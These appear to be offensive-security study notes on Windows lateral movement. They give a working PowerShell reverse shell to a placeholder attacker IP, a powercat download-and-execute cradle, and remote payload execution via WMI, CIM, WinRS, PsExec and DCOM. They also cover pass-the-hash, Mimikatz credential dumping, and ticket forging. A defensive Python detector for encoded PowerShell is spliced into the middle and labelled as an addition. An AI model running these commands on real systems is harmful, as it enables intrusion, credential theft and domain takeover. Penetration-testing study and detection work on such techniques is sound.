Lateral Movement

Via Reverse Shells

One-liner reverse shell:

    $payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP>",<Listening Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Powercat reverse shell:

    $payload = "IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP>/powercat.ps1');powercat -c <Kali IP> -p <Listening Port> -e powershell"
    
    $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

WMI

On the victim machine:
    wmic /node:<target IP> /user:<username> /password:<password> process call create "<payload>"

Execute payload
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "cmd"
    
    Example - $full_payload = "powershell -nop -w hidden -e $encodedPayload"
    Example - wmic /node:<IP> /user:<username> /password:<password> process call create "$full_payload"

Powershell

$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$sessionOption = New-CimSessionOption -Protocol Dcom
$session = New-CimSession -ComputerName <IP> -Credential $credential -SessionOption $sessionOption

$full_payload = "powershell -nop -w hidden -e $encodedPayload"

Execute payload
    Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $full_payload}
    
    OR
    
    New-PSSession -ComputerName <IP> -Credential $credential
    

WINRS

$full_payload = "powershell -nop -w hidden -e $encodedPayload"
winrs -r:<target IP/hostname> -u:<username> -p:<password> "$full_payload"

PsExec

On Kali machine:
    git clone https://github.com/davehardy20/sysinternals.git
        > Located in sysinternals/psexec64.exe
        > Transfer the executable to the compromised machine

On Victim machine:
    psexec64.exe -i \\<target IP/hostname> -u <domain name>\<username> -p "<password>" "<payload>"

Passing the Hash

On Kali machine:
	impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>
	proxychains impacket-wmiexec <username>@<target IP> -hashes :<user NTLM hash>

DCOM

1. Instantiate a remote MMC 2.0 application
	$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

2. Start up a listener to catch reverse shells on our kali
	nc -nlvp 4444

3. Generate the payload and execute it through the MMC20 object
	$full_payload = "powershell -nop -w hidden -e $encodedPayload"
	$dcom.Document.ActiveView.ExecuteShellCommand("<cmd | powershell>",$null,"$full_payload","7")

4. Return to the listener on our Kali; we should receive a reverse shell coming from the target machine.
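The WMI, PowerShell/CIM, WinRS, PsExec and DCOM sections above all end up spawning "powershell -nop -w hidden -e <Base64 of UTF-16LE>" under a characteristic parent process. As an added defender-side example (not part of these notes), the Python below decodes that encoded argument from a process-creation event and flags the parent/child pairing; the parent image names and the sample events are constructed, and the URL in the sample is a placeholder.

```python
import base64
import re

# Parent processes through which these notes' remote-execution techniques start their payload.
SUSPICIOUS_PARENTS = {
    "wmiprvse.exe": "WMI (wmic / Invoke-CimMethod Win32_Process Create)",
    "winrshost.exe": "WinRM (winrs / New-PSSession)",
    "psexesvc.exe": "PsExec service",
    "mmc.exe": "DCOM MMC20.Application ExecuteShellCommand",
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
NETWORK_INDICATORS = re.compile(r"(?i)TCPClient|GetStream|DownloadString|powercat")

def encode(script):
    """Mirror the page's [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -e/-EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(event):
    """event = {'parent': image path, 'cmdline': str} as in Sysmon Event 1 / 4688; returns findings."""
    findings = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    technique = SUSPICIOUS_PARENTS.get(parent)
    cmd = event["cmdline"]
    if technique and "powershell" in cmd.lower():
        findings.append(f"powershell spawned by {parent}: {technique}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded command decodes to: " + decoded)
        if NETWORK_INDICATORS.search(decoded):
            findings.append("decoded payload contains download/socket indicators")
    return findings

# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell -nop -w hidden -e "
                + encode("IEX(New-Object Net.WebClient).DownloadString('http://EXAMPLE/p.ps1')")},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]
```

Running analyse_event over the first sample yields three findings (WMI parent, decoded script, download indicator); the second, a locally started script without an encoded command, yields none.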

SSH private keys

ssh-keygen -t rsa
	# Generates an SSH key pair

ssh -i <private key> <username>@<IP>
ssh -i <private key> <username>@<IP> -o IdentitiesOnly=yes
	# Use when there are multiple private keys in the .ssh directory

Mimikatz

./mimikatz.exe
privilege::debug
	Identify target service user NTLM hash: sekurlsa::logonpasswords
	Identify krbtgt NTLM hash: lsadump::lsa /patch
	Get Domain SID: whoami /user

Overpass the Hash
	sekurlsa::pth /user:<username> /ntlm:<NTLM hash> /domain:<domain name> /run:<cmd | powershell>
	net use \\<target IP/hostname>
	./PsExec64.exe \\<target IP/hostname> <cmd | powershell>

Pass the Ticket
	sekurlsa::tickets /export
		# dir *.kirbi | findstr <username>
	kerberos::ptt <cifs.kirbi file name>
		# Attempt to access the resource as the current user, the authentication process will now make use of the newly injected TGT
	Example: ls \\<target IP/hostname>\<share name>
		iwr -UseDefaultCredentials http://<target IP/hostname>

Silver Ticket for specific service:
	kerberos::golden /rc4:<Target SPN NTLM Hash>  /sid:<Domain SID>  /domain:<domain name> /ptt /target:<Target SPN>  /service:<service protocol> /user:<authorized username>


Golden Ticket for all services:
	kerberos::golden /user:<username> /domain:<domain name> /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt

	Verify tickets with: klist
